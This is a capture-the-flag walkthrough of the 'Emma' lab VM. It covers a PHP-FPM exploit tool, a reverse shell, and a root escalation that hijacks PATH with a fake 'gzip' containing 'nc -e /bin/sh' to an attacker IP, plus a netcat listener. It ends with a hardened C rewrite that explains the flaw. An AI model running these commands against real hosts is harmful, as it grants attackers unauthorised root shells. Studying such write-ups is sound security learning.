You’ll find this VM here: https://hackmyvm.eu/machines/machine.php?vm=Emma
Directory scan
Robots.txt
Set up golang
- sudo apt-get install golang
- go get github.com/neex/phuip-fpizdam
- export PATH=$PATH:$(go env GOPATH)/bin
Run the script
Reverse shell
- curl
- listener
Found emma’s SSH credentials
- cat /etc/passwd
The database may contain important data
MySQL root login
Emma ssh login
┌──(alienum㉿kali)-[~]
└─$ ssh emma@10.0.2.171
emma@10.0.2.171's password: 5f******************************
Privilege Escalation
emma@emma:~$ sudo -l
Matching Defaults entries for emma on emma:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User emma may run the following commands on emma:
(ALL : ALL) NOPASSWD: /usr/bin/gzexe
emma@emma:~$ ls
flag.sh user.txt who who.c
emma@emma:~$ ./who
Im
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(emma)
But now Im
uid=1000(emma) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(emma)
emma@emma:~$ stat who
File: who
Size: 16760 Blocks: 40 IO Block: 4096 regular file
Device: 801h/2049d Inode: 146490 Links: 1
Access: (6750/-rwsr-s---) Uid: ( 0/ root) Gid: ( 1000/ emma)
emma@emma:~$ cat who.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid(), setgid() */
int main(void){
    setuid(0);        /* the binary is setuid root (mode 6750 above), so this succeeds */
    setgid(0);
    printf("Im \n");
    system("/bin/id");   /* runs through sh with the caller's inherited PATH */
    setuid(1000);
    setgid(1000);     /* fails: the process is now unprivileged and its saved gid is 0, so gid stays 0 (see the output above) */
    printf("But now Im \n");
    system("/bin/id");
    return 0;
}
emma@emma:~$ sudo -u root /usr/bin/gzexe /bin/id
/bin/id: 59.2%
emma@emma:~$ cd /tmp
emma@emma:/tmp$ echo "nc -e /bin/sh 10.0.2.15 4444" > gzip
emma@emma:/tmp$ chmod +x gzip
emma@emma:/tmp$ export PATH=/tmp:$PATH
emma@emma:/tmp$ cd
emma@emma:~$ ./who
Im
(UNKNOWN) [10.0.2.15] 4444 (?) : Connection refused
Cannot decompress /usr/bin/id
- listener
┌──(alienum㉿kali)-[~]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.0.2.15] from 10.0.2.171 [10.0.2.171] 43986
id
whoami
root
ls
flag.sh
user.txt
who
who.c
cd /root
ls
flag.sh
root.txt
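The chain above works because the setuid `who` binary runs `/bin/id` through system() with emma's PATH, and the sudo rule for gzexe lets a root-owned binary be rewritten into a wrapper script that looks up `gzip` on that PATH. The hardened rewrite below is an added example, not the VM's or the author's code: it refuses a tainted PATH and execs the child with a fixed environment; the list of shared writable directories it checks is an assumption.

```c
/* Hardened rewrite of the who.c pattern above (added example, not the VM's code).
 * A privileged helper must not let the caller's PATH decide what its children
 * run, and must exec them with a fixed environment instead of via system(). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#define SAFE_PATH "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

/* Return 1 if any PATH entry is empty or relative (resolved against the cwd)
 * or sits in a directory that unprivileged users can write to (assumed list). */
int path_has_untrusted_entry(const char *path)
{
    static const char *const shared[] = { "/tmp/", "/var/tmp/", "/dev/shm/", "/home/", NULL };
    if (path == NULL) return 0;
    for (const char *ent = path;;) {
        const char *end = strchr(ent, ':');
        size_t len = end ? (size_t)(end - ent) : strlen(ent);
        if (len == 0 || ent[0] != '/')
            return 1;                      /* "", "." or "bin": looked up relative to cwd */
        for (int i = 0; shared[i]; i++) {
            size_t dlen = strlen(shared[i]) - 1;   /* directory name without trailing '/' */
            if (len >= dlen && strncmp(ent, shared[i], dlen) == 0 && (len == dlen || ent[dlen] == '/'))
                return 1;                  /* entry is that directory or lies below it */
        }
        if (end == NULL) return 0;
        ent = end + 1;
    }
}

/* Run /bin/id with a fixed environment; returns its exit status, or -1 if the
 * inherited PATH looks tampered with or the child could not be started. */
int run_id_hardened(void)
{
    if (path_has_untrusted_entry(getenv("PATH")))
        return -1;                         /* refuse rather than trust the caller's env */
    char *const argv[] = { "/bin/id", NULL };
    char *const envp[] = { "PATH=" SAFE_PATH, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);       /* absolute path, no shell, no inherited env */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void) { return run_id_hardened() == 0 ? 0 : 1; }
```

With a PATH such as /tmp:/usr/bin the helper exits without running anything, and with a clean PATH the gzexe-style wrapper trick above would still only find the system gzip.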